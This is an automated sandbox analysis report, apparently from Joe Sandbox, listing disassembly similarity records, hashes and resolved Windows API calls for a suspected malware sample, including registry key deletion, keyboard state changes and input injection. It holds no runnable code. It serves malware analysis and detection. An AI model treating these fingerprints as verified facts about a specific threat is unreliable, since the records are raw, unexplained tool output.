                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: 856900be894ccb50b08fe09955658626f37a1d8e4c6fca202f24a3256b50b68b
                                                • Instruction ID: 538dd2cb64fada1494aab29f20fa08c70e21a04f3127bf0ebebbfc4f283b5480
                                                • Opcode Fuzzy Hash: 856900be894ccb50b08fe09955658626f37a1d8e4c6fca202f24a3256b50b68b
                                                • Instruction Fuzzy Hash: 6B11E375200308BEEF205F65CC4AFAB3BA9EF88754F014658FA45A61E1D6B6E811CB20
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AC2350,?), ref: 00AC22A1
                                                • GetProcAddress.KERNEL32(00000000), ref: 00AC22A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 2574300362-340411864
                                                • Opcode ID: 14c5c22a10f1a8881905a3471ddf01e03db47f67ce15c7ff5f1341544e0f63d5
                                                • Instruction ID: 0e3563be350a67586a57b74acf66c1ec22c2b4cdf53453643e49c73e605ffb18
                                                • Opcode Fuzzy Hash: 14c5c22a10f1a8881905a3471ddf01e03db47f67ce15c7ff5f1341544e0f63d5
                                                • Instruction Fuzzy Hash: E1E0E5706A0312ABDA606B61EC4AB5636A4B702702F504464F202F70E0DFF94041CB04
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AC2276), ref: 00AC2376
                                                • GetProcAddress.KERNEL32(00000000), ref: 00AC237D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 2574300362-2819208100
                                                • Opcode ID: dff445775d8f01d1b2463a999ee873f2814c3fb80593879b42e7941fa9697242
                                                • Instruction ID: 26a1c539b22de42d08e181f87a8009db92c36334b46c52ca618a5965fcbfc82b
                                                • Opcode Fuzzy Hash: dff445775d8f01d1b2463a999ee873f2814c3fb80593879b42e7941fa9697242
                                                • Instruction Fuzzy Hash: 9CE099716A4300ABDA226F62ED1EB063AA4B726702F2104A8F209B71F0CFB994108B14
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                • Opcode ID: 2667cc6d13e2149d2e25c97450e2cb45b7534a2da30a56b64b6d0dcaf2e870e0
                                                • Instruction ID: a7eb6fc6c505d28d418038702ef2898998bee8944d64313c0172307afc3b179c
                                                • Opcode Fuzzy Hash: 2667cc6d13e2149d2e25c97450e2cb45b7534a2da30a56b64b6d0dcaf2e870e0
                                                • Instruction Fuzzy Hash: 97E01271805618EBCB10D750CD85DF9B3FCE704741FA000D2F906E2414E735ABC8AA52
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00AA42EC,?,00AA42AA,?), ref: 00AA4304
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4316
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: 19785620ea71db8eac7c853ed736d6faa801aa4cd143b6853ce0cb056ad26168
                                                • Instruction ID: 0a3580ebbefbd82a4e16881a7fca787cdac6761fb64c716f8e84e91a9bae2e75
                                                • Opcode Fuzzy Hash: 19785620ea71db8eac7c853ed736d6faa801aa4cd143b6853ce0cb056ad26168
                                                • Instruction Fuzzy Hash: 5ED0A7705007129FDF304F24E80C74576D4AB09703B104499F842E36B0DBF0C8848620
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00B021FB,?,00B023EF), ref: 00B02213
                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00B02225
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetProcessId$kernel32.dll
                                                • API String ID: 2574300362-399901964
                                                • Opcode ID: 9741236e744b4c91392749bf0fe1c93cd5334ca7bb37fda77d47b2b52a225885
                                                • Instruction ID: 35c9c696c72136689244d9fdb3917df2168f4d11f708102677386e200ac63c64
                                                • Opcode Fuzzy Hash: 9741236e744b4c91392749bf0fe1c93cd5334ca7bb37fda77d47b2b52a225885
                                                • Instruction Fuzzy Hash: 8BD0A734500712AFD7314F70F80C7417AD4EB09306B1144D9EC81F35A0EB70D88C8650
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00AA41BB,00AA4341,?,00AA422F,?,00AA41BB,?,?,?,?,00AA39FE,?,00000001), ref: 00AA4359
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA436B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: cb8c3238fc9845753bd278b9c89f38d18337bfb320d029281c4ed39a7ea87d1a
                                                • Instruction ID: 1eecf71eb93c4f167158b57ed6d06420994eeddc743a70b832156944a9d3b1f9
                                                • Opcode Fuzzy Hash: cb8c3238fc9845753bd278b9c89f38d18337bfb320d029281c4ed39a7ea87d1a
                                                • Instruction Fuzzy Hash: 33D0A770500712AFDB309F30E80874176D4AB19717B204499F882E36A0DBF0D8848620
                                                APIs
                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,00AE051D,?,00AE05FE), ref: 00AE0547
                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AE0559
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                • API String ID: 2574300362-1071820185
                                                • Opcode ID: 90760dbb24adc370e50d5be3d007d2d8992250fbf21d19afae2f357c80c31107
                                                • Instruction ID: efb6745ad8991c0450f739da12e0a86f1dbd0e9557f779d88a5f8037d0ca1f25
                                                • Opcode Fuzzy Hash: 90760dbb24adc370e50d5be3d007d2d8992250fbf21d19afae2f357c80c31107
                                                • Instruction Fuzzy Hash: C9D0C7745457129FD7309F65F809B4177E4AB25713F10C8DDE856E3560DAB0C8C58E60
                                                APIs
                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00AE052F,?,00AE06D7), ref: 00AE0572
                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00AE0584
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                • API String ID: 2574300362-1587604923
                                                • Opcode ID: c820bded2eb0ec97ae6122586a93f8fb54f7e2a0b7de5c84a578a49cdc75d09a
                                                • Instruction ID: 11bf7c2b6bd764046f0cb1b53724b83dda78d74daa0414e3626e8ac9cd4e5cbd
                                                • Opcode Fuzzy Hash: c820bded2eb0ec97ae6122586a93f8fb54f7e2a0b7de5c84a578a49cdc75d09a
                                                • Instruction Fuzzy Hash: 7DD05E305013129AD7205F21A808B4277E4AB06302F1084A9EC81E2560DAB0C4C48A30
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00AFECBE,?,00AFEBBB), ref: 00AFECD6
                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFECE8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                • API String ID: 2574300362-1816364905
                                                • Opcode ID: 67d7cc25479388117471e0d74451743d2f9b05b052998c0b4d0ca72657d09c60
                                                • Instruction ID: 4258e37a1db7c9f324c0b1f2b1c8ed5a9ee25e33c5645611173e105730728f44
                                                • Opcode Fuzzy Hash: 67d7cc25479388117471e0d74451743d2f9b05b052998c0b4d0ca72657d09c60
                                                • Instruction Fuzzy Hash: 17D0A7305007239FDB309FA0E84875276E4AB04706B10849AFC45E3670DF70C8858A60
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00AFBAD3,00000001,00AFB6EE,?,00B3DC00), ref: 00AFBAEB
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AFBAFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: 142e945e1eabab9775969502e1534fcc3c30bf1c196636e2d0b558a5bb990f06
                                                • Instruction ID: 3c6937750e8e5eb6182a580b9dfe585387a5585730214a0638477908d9dd1a60
                                                • Opcode Fuzzy Hash: 142e945e1eabab9775969502e1534fcc3c30bf1c196636e2d0b558a5bb990f06
                                                • Instruction Fuzzy Hash: 15D0A7309107129FD7305F60EC48B6276E4AB04342B108499FD43E3560DBB0C884C620
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00B03BD1,?,00B03E06), ref: 00B03BE9
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B03BFB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: 602aff12208e52ddbf244bfb8b2131a51c00cb11409adccb5dc4247de67e93c4
                                                • Instruction ID: 77fe56bbcc118052576754e4158fc16f0b49955b4669ed5e614cc1b3d08971ad
                                                • Opcode Fuzzy Hash: 602aff12208e52ddbf244bfb8b2131a51c00cb11409adccb5dc4247de67e93c4
                                                • Instruction Fuzzy Hash: 16D09E705007529AE7345B66A818742BEF8EB0571AB1444D9E955E25A0DBB0D4858E50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18f0361ce3c2f077caf52497f0f21eb3ee8e248f6a95b755f67681ef901e8dd5
                                                • Instruction ID: c0926d69a160d1a5a83a1c50aa739aaed1352b5306b113d7a803a7a925dbce48
                                                • Opcode Fuzzy Hash: 18f0361ce3c2f077caf52497f0f21eb3ee8e248f6a95b755f67681ef901e8dd5
                                                • Instruction Fuzzy Hash: AFC15B75A1021AEFCB14DFA4C884AAFB7B5FF48704F10459AE916AB351DB30EE41DB90
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00AFAAB4
                                                • CoUninitialize.OLE32 ref: 00AFAABF
                                                  • Part of subcall function 00AE0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AE027B
                                                • VariantInit.OLEAUT32(?), ref: 00AFAACA
                                                • VariantClear.OLEAUT32(?), ref: 00AFAD9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                • Opcode ID: 40964c4910f09d2b85a523579182ce53d98dcde96f3dcba8662506a482d698b9
                                                • Instruction ID: ede0e21cee769ff072f747e1e538aca44a63c6af770daf86267ba38fc9e351c2
                                                • Opcode Fuzzy Hash: 40964c4910f09d2b85a523579182ce53d98dcde96f3dcba8662506a482d698b9
                                                • Instruction Fuzzy Hash: 49A168752047059FCB10EF54C981BAAB7F4BF99310F148449FA9A9B3A2CB30ED45CB96
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: f86aadb432006009cc0ce1e17404c312f70cd4d5725179382d465f7f2872a735
                                                • Instruction ID: ab88b1675ecce9572bea6ae0679e9a03896c715582de06e68d1900bbadcb5053
                                                • Opcode Fuzzy Hash: f86aadb432006009cc0ce1e17404c312f70cd4d5725179382d465f7f2872a735
                                                • Instruction Fuzzy Hash: 1D51A030600706ABDB24AF6AD895A6FB3E9EF49310F20881FE557DB3D2DB70D8808715
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                • String ID:
                                                • API String ID: 3877424927-0
                                                • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                • Instruction ID: 9c1bdb3044c4c36a361c869ffddca095430d78fd0d5bfb61995f4f6fc03491ff
                                                • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                • Instruction Fuzzy Hash: 3D5191B6A00305ABDF24DF698984FAE77B5AF40320F26C62DF836962D0D7749F509B40
                                                APIs
                                                • GetWindowRect.USER32(01318148,?), ref: 00B0C544
                                                • ScreenToClient.USER32(?,00000002), ref: 00B0C574
                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00B0C5DA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: 746874f4f38fc9d098681606153444f1f8d4c2d63a17a6f7f950481d8c13a5b9
                                                • Instruction ID: 8f7b9889eb62d48d94e9ba2f8b1f9033fc7fd4512810e86ef58bd31b53fac4c4
                                                • Opcode Fuzzy Hash: 746874f4f38fc9d098681606153444f1f8d4c2d63a17a6f7f950481d8c13a5b9
                                                • Instruction Fuzzy Hash: 22513875A00205AFCF20DF68C881AAE7FF6FB55320F248699F9659B2D1D770AD41CB90
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ADC462
                                                • __itow.LIBCMT ref: 00ADC49C
                                                  • Part of subcall function 00ADC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ADC753
                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ADC505
                                                • __itow.LIBCMT ref: 00ADC55A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: 0b1ffcffb48f7715382fff1aa64d02dc1ed1e32aa16a53c052138b64840ee82e
                                                • Instruction ID: dadb1971553b897bcd71908dadd2963bdd4f6d7d7fe1507187eaf04668491148
                                                • Opcode Fuzzy Hash: 0b1ffcffb48f7715382fff1aa64d02dc1ed1e32aa16a53c052138b64840ee82e
                                                • Instruction Fuzzy Hash: 5441F771A00209AFDF25EF64C945FFE7BB9AF49710F40005AF906A3282DB719A45CBA1
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AE3966
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AE3982
                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00AE39EF
                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00AE3A4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
